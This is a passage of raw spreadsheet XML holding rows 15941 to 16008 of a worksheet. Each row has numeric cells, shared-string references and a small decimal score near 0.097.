      </c>
      <c r="B15941" s="2">
        <v>4.47193E7</v>
      </c>
      <c r="C15941" s="2" t="s">
        <v>15386</v>
      </c>
      <c r="D15941" s="2">
        <v>1.0</v>
      </c>
      <c r="E15941" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15941" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="15942" ht="15.75" customHeight="1">
      <c r="A15942" s="1">
        <v>15704.0</v>
      </c>
      <c r="B15942" s="2">
        <v>4.3940662E7</v>
      </c>
      <c r="C15942" s="2" t="s">
        <v>15387</v>
      </c>
      <c r="D15942" s="2">
        <v>1.0</v>
      </c>
      <c r="E15942" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15942" s="2">
        <v>0.09797979797979799</v>
      </c>
    </row>
    <row r="15943" ht="15.75" customHeight="1">
      <c r="A15943" s="1">
        <v>834.0</v>
      </c>
      <c r="B15943" s="2">
        <v>2.1582172E7</v>
      </c>
      <c r="C15943" s="2" t="s">
        <v>15388</v>
      </c>
      <c r="D15943" s="2">
        <v>1.0</v>
      </c>
      <c r="E15943" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15943" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="15944" ht="15.75" customHeight="1">
      <c r="A15944" s="1">
        <v>3199.0</v>
      </c>
      <c r="B15944" s="2">
        <v>3.7234517E7</v>
      </c>
      <c r="C15944" s="2" t="s">
        <v>15389</v>
      </c>
      <c r="D15944" s="2">
        <v>1.0</v>
      </c>
      <c r="E15944" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15944" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="15945" ht="15.75" customHeight="1">
      <c r="A15945" s="1">
        <v>5387.0</v>
      </c>
      <c r="B15945" s="2">
        <v>4.5439161E7</v>
      </c>
      <c r="C15945" s="2" t="s">
        <v>15390</v>
      </c>
      <c r="D15945" s="2">
        <v>1.0</v>
      </c>
      <c r="E15945" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15945" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="15946" ht="15.75" customHeight="1">
      <c r="A15946" s="1">
        <v>16775.0</v>
      </c>
      <c r="B15946" s="2">
        <v>4.7719243E7</v>
      </c>
      <c r="C15946" s="2" t="s">
        <v>15391</v>
      </c>
      <c r="D15946" s="2">
        <v>1.0</v>
      </c>
      <c r="E15946" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15946" s="2">
        <v>0.09797979797979796</v>
      </c>
    </row>
    <row r="15947" ht="15.75" customHeight="1">
      <c r="A15947" s="1">
        <v>29632.0</v>
      </c>
      <c r="B15947" s="2">
        <v>3.3714432E7</v>
      </c>
      <c r="C15947" s="2" t="s">
        <v>15392</v>
      </c>
      <c r="D15947" s="2">
        <v>1.0</v>
      </c>
      <c r="E15947" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15947" s="2">
        <v>0.09797979797979794</v>
      </c>
    </row>
    <row r="15948" ht="15.75" customHeight="1">
      <c r="A15948" s="1">
        <v>4760.0</v>
      </c>
      <c r="B15948" s="2">
        <v>4.3407372E7</v>
      </c>
      <c r="C15948" s="2" t="s">
        <v>15393</v>
      </c>
      <c r="D15948" s="2">
        <v>1.0</v>
      </c>
      <c r="E15948" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15948" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="15949" ht="15.75" customHeight="1">
      <c r="A15949" s="1">
        <v>5685.0</v>
      </c>
      <c r="B15949" s="2">
        <v>4.6417226E7</v>
      </c>
      <c r="C15949" s="2" t="s">
        <v>15394</v>
      </c>
      <c r="D15949" s="2">
        <v>1.0</v>
      </c>
      <c r="E15949" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15949" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="15950" ht="15.75" customHeight="1">
      <c r="A15950" s="1">
        <v>7192.0</v>
      </c>
      <c r="B15950" s="2">
        <v>5.0576962E7</v>
      </c>
      <c r="C15950" s="2" t="s">
        <v>15395</v>
      </c>
      <c r="D15950" s="2">
        <v>1.0</v>
      </c>
      <c r="E15950" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15950" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="15951" ht="15.75" customHeight="1">
      <c r="A15951" s="1">
        <v>10161.0</v>
      </c>
      <c r="B15951" s="2">
        <v>5.7334953E7</v>
      </c>
      <c r="C15951" s="2" t="s">
        <v>15396</v>
      </c>
      <c r="D15951" s="2">
        <v>1.0</v>
      </c>
      <c r="E15951" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15951" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="15952" ht="15.75" customHeight="1">
      <c r="A15952" s="1">
        <v>14658.0</v>
      </c>
      <c r="B15952" s="2">
        <v>4.0425039E7</v>
      </c>
      <c r="C15952" s="2" t="s">
        <v>15397</v>
      </c>
      <c r="D15952" s="2">
        <v>1.0</v>
      </c>
      <c r="E15952" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15952" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="15953" ht="15.75" customHeight="1">
      <c r="A15953" s="1">
        <v>19791.0</v>
      </c>
      <c r="B15953" s="2">
        <v>5.6819422E7</v>
      </c>
      <c r="C15953" s="2" t="s">
        <v>15398</v>
      </c>
      <c r="D15953" s="2">
        <v>1.0</v>
      </c>
      <c r="E15953" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15953" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="15954" ht="15.75" customHeight="1">
      <c r="A15954" s="1">
        <v>20034.0</v>
      </c>
      <c r="B15954" s="2">
        <v>7308739.0</v>
      </c>
      <c r="C15954" s="2" t="s">
        <v>15399</v>
      </c>
      <c r="D15954" s="2">
        <v>1.0</v>
      </c>
      <c r="E15954" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15954" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="15955" ht="15.75" customHeight="1">
      <c r="A15955" s="1">
        <v>23303.0</v>
      </c>
      <c r="B15955" s="2">
        <v>5.4092165E7</v>
      </c>
      <c r="C15955" s="2" t="s">
        <v>15400</v>
      </c>
      <c r="D15955" s="2">
        <v>1.0</v>
      </c>
      <c r="E15955" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15955" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="15956" ht="15.75" customHeight="1">
      <c r="A15956" s="1">
        <v>432.0</v>
      </c>
      <c r="B15956" s="2">
        <v>1.7000459E7</v>
      </c>
      <c r="C15956" s="2" t="s">
        <v>15401</v>
      </c>
      <c r="D15956" s="2">
        <v>1.0</v>
      </c>
      <c r="E15956" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15956" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="15957" ht="15.75" customHeight="1">
      <c r="A15957" s="1">
        <v>1349.0</v>
      </c>
      <c r="B15957" s="2">
        <v>2.5956694E7</v>
      </c>
      <c r="C15957" s="2" t="s">
        <v>15402</v>
      </c>
      <c r="D15957" s="2">
        <v>1.0</v>
      </c>
      <c r="E15957" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15957" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="15958" ht="15.75" customHeight="1">
      <c r="A15958" s="1">
        <v>1652.0</v>
      </c>
      <c r="B15958" s="2">
        <v>2.811676E7</v>
      </c>
      <c r="C15958" s="2" t="s">
        <v>15403</v>
      </c>
      <c r="D15958" s="2">
        <v>1.0</v>
      </c>
      <c r="E15958" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15958" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="15959" ht="15.75" customHeight="1">
      <c r="A15959" s="1">
        <v>3854.0</v>
      </c>
      <c r="B15959" s="2">
        <v>4.0300022E7</v>
      </c>
      <c r="C15959" s="2" t="s">
        <v>15404</v>
      </c>
      <c r="D15959" s="2">
        <v>1.0</v>
      </c>
      <c r="E15959" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15959" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="15960" ht="15.75" customHeight="1">
      <c r="A15960" s="1">
        <v>7270.0</v>
      </c>
      <c r="B15960" s="2">
        <v>5.0784981E7</v>
      </c>
      <c r="C15960" s="2" t="s">
        <v>15405</v>
      </c>
      <c r="D15960" s="2">
        <v>1.0</v>
      </c>
      <c r="E15960" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15960" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="15961" ht="15.75" customHeight="1">
      <c r="A15961" s="1">
        <v>8973.0</v>
      </c>
      <c r="B15961" s="2">
        <v>5.4954966E7</v>
      </c>
      <c r="C15961" s="2" t="s">
        <v>15406</v>
      </c>
      <c r="D15961" s="2">
        <v>1.0</v>
      </c>
      <c r="E15961" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15961" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="15962" ht="15.75" customHeight="1">
      <c r="A15962" s="1">
        <v>11413.0</v>
      </c>
      <c r="B15962" s="2">
        <v>2.165388E7</v>
      </c>
      <c r="C15962" s="2" t="s">
        <v>15407</v>
      </c>
      <c r="D15962" s="2">
        <v>1.0</v>
      </c>
      <c r="E15962" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15962" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="15963" ht="15.75" customHeight="1">
      <c r="A15963" s="1">
        <v>15362.0</v>
      </c>
      <c r="B15963" s="2">
        <v>4.2712467E7</v>
      </c>
      <c r="C15963" s="2" t="s">
        <v>15408</v>
      </c>
      <c r="D15963" s="2">
        <v>1.0</v>
      </c>
      <c r="E15963" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15963" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="15964" ht="15.75" customHeight="1">
      <c r="A15964" s="1">
        <v>19379.0</v>
      </c>
      <c r="B15964" s="2">
        <v>5.549376E7</v>
      </c>
      <c r="C15964" s="2" t="s">
        <v>15409</v>
      </c>
      <c r="D15964" s="2">
        <v>1.0</v>
      </c>
      <c r="E15964" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15964" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="15965" ht="15.75" customHeight="1">
      <c r="A15965" s="1">
        <v>34148.0</v>
      </c>
      <c r="B15965" s="2">
        <v>9855339.0</v>
      </c>
      <c r="C15965" s="2" t="s">
        <v>15410</v>
      </c>
      <c r="D15965" s="2">
        <v>1.0</v>
      </c>
      <c r="E15965" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15965" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="15966" ht="15.75" customHeight="1">
      <c r="A15966" s="1">
        <v>1866.0</v>
      </c>
      <c r="B15966" s="2">
        <v>2.9578643E7</v>
      </c>
      <c r="C15966" s="2" t="s">
        <v>15411</v>
      </c>
      <c r="D15966" s="2">
        <v>1.0</v>
      </c>
      <c r="E15966" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15966" s="2">
        <v>0.09773662551440325</v>
      </c>
    </row>
    <row r="15967" ht="15.75" customHeight="1">
      <c r="A15967" s="1">
        <v>2199.0</v>
      </c>
      <c r="B15967" s="2">
        <v>3.2044397E7</v>
      </c>
      <c r="C15967" s="2" t="s">
        <v>15412</v>
      </c>
      <c r="D15967" s="2">
        <v>1.0</v>
      </c>
      <c r="E15967" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15967" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15968" ht="15.75" customHeight="1">
      <c r="A15968" s="1">
        <v>2973.0</v>
      </c>
      <c r="B15968" s="2">
        <v>3.610174E7</v>
      </c>
      <c r="C15968" s="2" t="s">
        <v>15413</v>
      </c>
      <c r="D15968" s="2">
        <v>1.0</v>
      </c>
      <c r="E15968" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15968" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15969" ht="15.75" customHeight="1">
      <c r="A15969" s="1">
        <v>3713.0</v>
      </c>
      <c r="B15969" s="2">
        <v>3.9605114E7</v>
      </c>
      <c r="C15969" s="2" t="s">
        <v>15414</v>
      </c>
      <c r="D15969" s="2">
        <v>1.0</v>
      </c>
      <c r="E15969" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15969" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15970" ht="15.75" customHeight="1">
      <c r="A15970" s="1">
        <v>3764.0</v>
      </c>
      <c r="B15970" s="2">
        <v>3.9817895E7</v>
      </c>
      <c r="C15970" s="2" t="s">
        <v>15415</v>
      </c>
      <c r="D15970" s="2">
        <v>1.0</v>
      </c>
      <c r="E15970" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15970" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15971" ht="15.75" customHeight="1">
      <c r="A15971" s="1">
        <v>5302.0</v>
      </c>
      <c r="B15971" s="2">
        <v>4.5250908E7</v>
      </c>
      <c r="C15971" s="2" t="s">
        <v>15416</v>
      </c>
      <c r="D15971" s="2">
        <v>1.0</v>
      </c>
      <c r="E15971" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15971" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15972" ht="15.75" customHeight="1">
      <c r="A15972" s="1">
        <v>5453.0</v>
      </c>
      <c r="B15972" s="2">
        <v>4.5657531E7</v>
      </c>
      <c r="C15972" s="2" t="s">
        <v>15417</v>
      </c>
      <c r="D15972" s="2">
        <v>1.0</v>
      </c>
      <c r="E15972" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15972" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15973" ht="15.75" customHeight="1">
      <c r="A15973" s="1">
        <v>8188.0</v>
      </c>
      <c r="B15973" s="2">
        <v>5.3250492E7</v>
      </c>
      <c r="C15973" s="2" t="s">
        <v>15418</v>
      </c>
      <c r="D15973" s="2">
        <v>1.0</v>
      </c>
      <c r="E15973" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15973" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15974" ht="15.75" customHeight="1">
      <c r="A15974" s="1">
        <v>12611.0</v>
      </c>
      <c r="B15974" s="2">
        <v>3.0163927E7</v>
      </c>
      <c r="C15974" s="2" t="s">
        <v>15419</v>
      </c>
      <c r="D15974" s="2">
        <v>1.0</v>
      </c>
      <c r="E15974" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15974" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15975" ht="15.75" customHeight="1">
      <c r="A15975" s="1">
        <v>14335.0</v>
      </c>
      <c r="B15975" s="2">
        <v>3.8765187E7</v>
      </c>
      <c r="C15975" s="2" t="s">
        <v>15420</v>
      </c>
      <c r="D15975" s="2">
        <v>1.0</v>
      </c>
      <c r="E15975" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15975" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15976" ht="15.75" customHeight="1">
      <c r="A15976" s="1">
        <v>14864.0</v>
      </c>
      <c r="B15976" s="2">
        <v>4.1070464E7</v>
      </c>
      <c r="C15976" s="2" t="s">
        <v>15421</v>
      </c>
      <c r="D15976" s="2">
        <v>1.0</v>
      </c>
      <c r="E15976" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15976" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15977" ht="15.75" customHeight="1">
      <c r="A15977" s="1">
        <v>16312.0</v>
      </c>
      <c r="B15977" s="2">
        <v>4.5959535E7</v>
      </c>
      <c r="C15977" s="2" t="s">
        <v>15422</v>
      </c>
      <c r="D15977" s="2">
        <v>1.0</v>
      </c>
      <c r="E15977" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15977" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15978" ht="15.75" customHeight="1">
      <c r="A15978" s="1">
        <v>17593.0</v>
      </c>
      <c r="B15978" s="2">
        <v>5.0303964E7</v>
      </c>
      <c r="C15978" s="2" t="s">
        <v>15423</v>
      </c>
      <c r="D15978" s="2">
        <v>1.0</v>
      </c>
      <c r="E15978" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15978" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15979" ht="15.75" customHeight="1">
      <c r="A15979" s="1">
        <v>17969.0</v>
      </c>
      <c r="B15979" s="2">
        <v>5.1353516E7</v>
      </c>
      <c r="C15979" s="2" t="s">
        <v>15424</v>
      </c>
      <c r="D15979" s="2">
        <v>1.0</v>
      </c>
      <c r="E15979" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15979" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15980" ht="15.75" customHeight="1">
      <c r="A15980" s="1">
        <v>19009.0</v>
      </c>
      <c r="B15980" s="2">
        <v>5.4498798E7</v>
      </c>
      <c r="C15980" s="2" t="s">
        <v>15425</v>
      </c>
      <c r="D15980" s="2">
        <v>1.0</v>
      </c>
      <c r="E15980" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15980" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15981" ht="15.75" customHeight="1">
      <c r="A15981" s="1">
        <v>21498.0</v>
      </c>
      <c r="B15981" s="2">
        <v>2.3106167E7</v>
      </c>
      <c r="C15981" s="2" t="s">
        <v>15426</v>
      </c>
      <c r="D15981" s="2">
        <v>1.0</v>
      </c>
      <c r="E15981" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15981" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15982" ht="15.75" customHeight="1">
      <c r="A15982" s="1">
        <v>25202.0</v>
      </c>
      <c r="B15982" s="2">
        <v>1.3213953E7</v>
      </c>
      <c r="C15982" s="2" t="s">
        <v>15427</v>
      </c>
      <c r="D15982" s="2">
        <v>1.0</v>
      </c>
      <c r="E15982" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15982" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15983" ht="15.75" customHeight="1">
      <c r="A15983" s="1">
        <v>25218.0</v>
      </c>
      <c r="B15983" s="2">
        <v>1.3308406E7</v>
      </c>
      <c r="C15983" s="2" t="s">
        <v>15428</v>
      </c>
      <c r="D15983" s="2">
        <v>1.0</v>
      </c>
      <c r="E15983" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15983" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15984" ht="15.75" customHeight="1">
      <c r="A15984" s="1">
        <v>26778.0</v>
      </c>
      <c r="B15984" s="2">
        <v>1.8521099E7</v>
      </c>
      <c r="C15984" s="2" t="s">
        <v>15429</v>
      </c>
      <c r="D15984" s="2">
        <v>1.0</v>
      </c>
      <c r="E15984" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15984" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15985" ht="15.75" customHeight="1">
      <c r="A15985" s="1">
        <v>28386.0</v>
      </c>
      <c r="B15985" s="2">
        <v>2.6119611E7</v>
      </c>
      <c r="C15985" s="2" t="s">
        <v>15430</v>
      </c>
      <c r="D15985" s="2">
        <v>1.0</v>
      </c>
      <c r="E15985" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15985" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15986" ht="15.75" customHeight="1">
      <c r="A15986" s="1">
        <v>30000.0</v>
      </c>
      <c r="B15986" s="2">
        <v>3612938.0</v>
      </c>
      <c r="C15986" s="2" t="s">
        <v>15431</v>
      </c>
      <c r="D15986" s="2">
        <v>1.0</v>
      </c>
      <c r="E15986" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15986" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15987" ht="15.75" customHeight="1">
      <c r="A15987" s="1">
        <v>30812.0</v>
      </c>
      <c r="B15987" s="2">
        <v>4.5288882E7</v>
      </c>
      <c r="C15987" s="2" t="s">
        <v>15432</v>
      </c>
      <c r="D15987" s="2">
        <v>1.0</v>
      </c>
      <c r="E15987" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15987" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15988" ht="15.75" customHeight="1">
      <c r="A15988" s="1">
        <v>31854.0</v>
      </c>
      <c r="B15988" s="2">
        <v>5277105.0</v>
      </c>
      <c r="C15988" s="2" t="s">
        <v>15433</v>
      </c>
      <c r="D15988" s="2">
        <v>1.0</v>
      </c>
      <c r="E15988" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15988" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15989" ht="15.75" customHeight="1">
      <c r="A15989" s="1">
        <v>32687.0</v>
      </c>
      <c r="B15989" s="2">
        <v>5953420.0</v>
      </c>
      <c r="C15989" s="2" t="s">
        <v>15434</v>
      </c>
      <c r="D15989" s="2">
        <v>1.0</v>
      </c>
      <c r="E15989" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15989" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="15990" ht="15.75" customHeight="1">
      <c r="A15990" s="1">
        <v>3.0</v>
      </c>
      <c r="B15990" s="2">
        <v>1.0082309E7</v>
      </c>
      <c r="C15990" s="2" t="s">
        <v>15435</v>
      </c>
      <c r="D15990" s="2">
        <v>1.0</v>
      </c>
      <c r="E15990" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15990" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="15991" ht="15.75" customHeight="1">
      <c r="A15991" s="1">
        <v>31.0</v>
      </c>
      <c r="B15991" s="2">
        <v>1.0523683E7</v>
      </c>
      <c r="C15991" s="2" t="s">
        <v>15436</v>
      </c>
      <c r="D15991" s="2">
        <v>1.0</v>
      </c>
      <c r="E15991" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15991" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="15992" ht="15.75" customHeight="1">
      <c r="A15992" s="1">
        <v>38.0</v>
      </c>
      <c r="B15992" s="2">
        <v>1.0715302E7</v>
      </c>
      <c r="C15992" s="2" t="s">
        <v>15437</v>
      </c>
      <c r="D15992" s="2">
        <v>1.0</v>
      </c>
      <c r="E15992" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15992" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="15993" ht="15.75" customHeight="1">
      <c r="A15993" s="1">
        <v>140.0</v>
      </c>
      <c r="B15993" s="2">
        <v>1.3573994E7</v>
      </c>
      <c r="C15993" s="2" t="s">
        <v>15438</v>
      </c>
      <c r="D15993" s="2">
        <v>1.0</v>
      </c>
      <c r="E15993" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15993" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="15994" ht="15.75" customHeight="1">
      <c r="A15994" s="1">
        <v>245.0</v>
      </c>
      <c r="B15994" s="2">
        <v>1.5033223E7</v>
      </c>
      <c r="C15994" s="2" t="s">
        <v>15439</v>
      </c>
      <c r="D15994" s="2">
        <v>1.0</v>
      </c>
      <c r="E15994" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15994" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="15995" ht="15.75" customHeight="1">
      <c r="A15995" s="1">
        <v>684.0</v>
      </c>
      <c r="B15995" s="2">
        <v>2.030255E7</v>
      </c>
      <c r="C15995" s="2" t="s">
        <v>15440</v>
      </c>
      <c r="D15995" s="2">
        <v>1.0</v>
      </c>
      <c r="E15995" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15995" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="15996" ht="15.75" customHeight="1">
      <c r="A15996" s="1">
        <v>753.0</v>
      </c>
      <c r="B15996" s="2">
        <v>2.0936184E7</v>
      </c>
      <c r="C15996" s="2" t="s">
        <v>15441</v>
      </c>
      <c r="D15996" s="2">
        <v>1.0</v>
      </c>
      <c r="E15996" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15996" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="15997" ht="15.75" customHeight="1">
      <c r="A15997" s="1">
        <v>912.0</v>
      </c>
      <c r="B15997" s="2">
        <v>2.2187286E7</v>
      </c>
      <c r="C15997" s="2" t="s">
        <v>15442</v>
      </c>
      <c r="D15997" s="2">
        <v>1.0</v>
      </c>
      <c r="E15997" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15997" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="15998" ht="15.75" customHeight="1">
      <c r="A15998" s="1">
        <v>1195.0</v>
      </c>
      <c r="B15998" s="2">
        <v>2.4738492E7</v>
      </c>
      <c r="C15998" s="2" t="s">
        <v>15443</v>
      </c>
      <c r="D15998" s="2">
        <v>1.0</v>
      </c>
      <c r="E15998" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15998" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="15999" ht="15.75" customHeight="1">
      <c r="A15999" s="1">
        <v>1373.0</v>
      </c>
      <c r="B15999" s="2">
        <v>2.6030646E7</v>
      </c>
      <c r="C15999" s="2" t="s">
        <v>15444</v>
      </c>
      <c r="D15999" s="2">
        <v>1.0</v>
      </c>
      <c r="E15999" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15999" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16000" ht="15.75" customHeight="1">
      <c r="A16000" s="1">
        <v>1452.0</v>
      </c>
      <c r="B16000" s="2">
        <v>2.6838953E7</v>
      </c>
      <c r="C16000" s="2" t="s">
        <v>15445</v>
      </c>
      <c r="D16000" s="2">
        <v>1.0</v>
      </c>
      <c r="E16000" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16000" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16001" ht="15.75" customHeight="1">
      <c r="A16001" s="1">
        <v>1568.0</v>
      </c>
      <c r="B16001" s="2">
        <v>2.7658953E7</v>
      </c>
      <c r="C16001" s="2" t="s">
        <v>15446</v>
      </c>
      <c r="D16001" s="2">
        <v>1.0</v>
      </c>
      <c r="E16001" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16001" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16002" ht="15.75" customHeight="1">
      <c r="A16002" s="1">
        <v>2258.0</v>
      </c>
      <c r="B16002" s="2">
        <v>3.2366781E7</v>
      </c>
      <c r="C16002" s="2" t="s">
        <v>15447</v>
      </c>
      <c r="D16002" s="2">
        <v>1.0</v>
      </c>
      <c r="E16002" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16002" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16003" ht="15.75" customHeight="1">
      <c r="A16003" s="1">
        <v>2285.0</v>
      </c>
      <c r="B16003" s="2">
        <v>3.2549944E7</v>
      </c>
      <c r="C16003" s="2" t="s">
        <v>15448</v>
      </c>
      <c r="D16003" s="2">
        <v>1.0</v>
      </c>
      <c r="E16003" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16003" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16004" ht="15.75" customHeight="1">
      <c r="A16004" s="1">
        <v>3465.0</v>
      </c>
      <c r="B16004" s="2">
        <v>3.8337079E7</v>
      </c>
      <c r="C16004" s="2" t="s">
        <v>15449</v>
      </c>
      <c r="D16004" s="2">
        <v>1.0</v>
      </c>
      <c r="E16004" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16004" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16005" ht="15.75" customHeight="1">
      <c r="A16005" s="1">
        <v>3647.0</v>
      </c>
      <c r="B16005" s="2">
        <v>3.9289372E7</v>
      </c>
      <c r="C16005" s="2" t="s">
        <v>15450</v>
      </c>
      <c r="D16005" s="2">
        <v>1.0</v>
      </c>
      <c r="E16005" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16005" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16006" ht="15.75" customHeight="1">
      <c r="A16006" s="1">
        <v>3723.0</v>
      </c>
      <c r="B16006" s="2">
        <v>3.9613235E7</v>
      </c>
      <c r="C16006" s="2" t="s">
        <v>15451</v>
      </c>
      <c r="D16006" s="2">
        <v>1.0</v>
      </c>
      <c r="E16006" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16006" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16007" ht="15.75" customHeight="1">
      <c r="A16007" s="1">
        <v>3754.0</v>
      </c>
      <c r="B16007" s="2">
        <v>3.9729561E7</v>
      </c>
      <c r="C16007" s="2" t="s">
        <v>15452</v>
      </c>
      <c r="D16007" s="2">
        <v>1.0</v>
      </c>
      <c r="E16007" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F16007" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="16008" ht="15.75" customHeight="1">
      <c r="A16008" s="1">
        <v>3823.0</v>
      </c>
